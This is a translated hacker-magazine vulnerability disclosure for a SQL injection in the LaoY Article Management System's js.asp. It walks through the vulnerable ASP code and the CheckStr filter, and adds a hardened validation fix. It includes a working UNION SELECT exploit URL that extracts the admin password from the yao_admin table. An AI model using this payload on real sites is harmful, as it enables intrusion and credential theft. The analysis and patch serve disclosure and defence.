老Y Article Management System injection 0day [Network Technology]
Author: 幻泉 [B.S.N], published in 黑客防线 (Hacker Defense)
Code:
If CheckStr(Request("ClassNo")) <> "" then
ClassNo = split(CheckStr(Request("ClassNo")),"|")
' The parameter is fetched here and run through the CheckStr filter, but the filter seems to have no effect; the value is then split into an array.
on error resume next
NClassID = LaoYRequest(ClassNo(0))
NClassID1 = LaoYRequest(ClassNo(1))
' Array elements 0 and 1 are integer-filtered by LaoYRequest. No vulnerability here.
End if
num = LaoYRequest(request.querystring("num")) ' num must be >= 1 here
.......
set rs=server.createObject("Adodb.recordset")
sql = "Select top "& num &" ID,Title,TitleFontColor,Author,ClassID,DateAndTime,Hits,IsTop,IsHot from Yao_Article Where yn = 0"
If NclassID<>"" and NclassID1="" then
If Yao_MyID(NclassID)="0" then
SQL=SQL&" and Class"
else
MyID = Replace(""&Yao_MyID(NclassID)&"","|",",")
SQL=SQL&" and ClassID in ("&MyID&")"
End if
elseif NclassID<>"" and NclassID1<>"" then
MyID = Replace(""&Request("ClassNo")&"","|",",")
SQL=SQL&" and ClassID in ("&MyID&")"
' The problem is here: ClassNo is taken straight from Request("ClassNo") and written into the query with no further filtering, so neither CheckStr nor LaoYRequest applies to the value that reaches the IN clause.
End if
select case topType
case "new": sql=sql&" order by DateAndTime desc,ID desc"
case "hot": sql=sql&" order by hits desc,ID desc"
case "IsHot": sql=sql&" and IsHot = 1 order by ID desc"
end select
set rs = conn.execute(sql)
if rs.bof and rs.eof then
str=str+"没有符合条件的文章"
........
-------------------------------
function.asp
Code:
function CheckStr(str)
' Blacklist filter: HTML-escapes angle brackets, strips CR and spaces, then deletes a fixed list of SQL keywords and punctuation.
CheckStr=replace(replace(replace(replace(str,"<","&lt;"),">","&gt;"),chr(13),"")," ","")
CheckStr=replace(replace(replace(replace(CheckStr,"'",""),"and",""),"insert",""),"set","")
CheckStr=replace(replace(replace(replace(CheckStr,"select",""),"update",""),"delete",""),chr(34),"")
CheckStr=replace(replace(replace(replace(replace(CheckStr,"*",""),"=",""),"or",""),"mid",""),"count","")
end function
Exploit code:
js.asp?num=1&ClassNo=1|1|1[SQL]
js.asp?num=1&ClassNo=1|1|1) union select 1,admin_pass,3,4,5,6,7,8,9 from yao_admin where id in(1 #### retrieves the admin password
Note: this vulnerability was tested on version 2.4. Download from Chinaz: http://down.chinaz.com/soft/23126.htm
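The fix a defender would apply to js.asp, as an added example that is neither the original post's code nor the LaoY project's own: every element of ClassNo is validated as a plain run of digits before the IN list is built, so the raw Request("ClassNo") value never reaches the query. The helper names IsDigits and SafeClassIdList, the digit-only rule and the 400 response are assumptions; LaoYRequest and Yao_MyID, whose source the post does not show, are not reproduced, and only the two-element ClassNo branch is covered.

```vbscript
<%
' Added hardened fragment for js.asp (not the project's own code).
' IsDigits is a hypothetical helper: True only for a bounded run of ASCII digits.
Function IsDigits(s)
    Dim k
    IsDigits = False
    If Len(s) = 0 Or Len(s) > 9 Then Exit Function
    For k = 1 To Len(s)
        If InStr("0123456789", Mid(s, k, 1)) = 0 Then Exit Function
    Next
    IsDigits = True
End Function

' SafeClassIdList (hypothetical name) turns the pipe-separated ClassNo value into a
' comma-separated list of validated integers, or "" if any element fails IsDigits.
Function SafeClassIdList(raw)
    Dim parts, i, item, result
    SafeClassIdList = ""
    If raw = "" Then Exit Function
    parts = Split(raw, "|")
    result = ""
    For i = 0 To UBound(parts)
        item = Trim(parts(i))
        ' "1) union select ..." fails here, as does anything CheckStr's blacklist missed.
        If Not IsDigits(item) Then Exit Function
        If result <> "" Then result = result & ","
        result = result & CStr(CLng(item))
    Next
    SafeClassIdList = result
End Function

' num is forced to a positive integer here instead of relying on LaoYRequest.
Dim num, classIds, sql
num = Request.QueryString("num")
If Not IsDigits(num) Then num = "1"
num = CLng(num)
If num < 1 Then num = 1

sql = "Select top " & num & " ID,Title,TitleFontColor,Author,ClassID," & _
      "DateAndTime,Hits,IsTop,IsHot from Yao_Article Where yn = 0"
classIds = SafeClassIdList(Request("ClassNo"))
If classIds <> "" Then
    ' Only validated integers reach the IN (...) clause.
    sql = sql & " and ClassID in (" & classIds & ")"
ElseIf Request("ClassNo") <> "" Then
    ' Malformed ClassNo: reject the request instead of falling back to the raw value.
    Response.Status = "400 Bad Request"
    Response.Write "Invalid ClassNo"
    Response.End
End If
%>
```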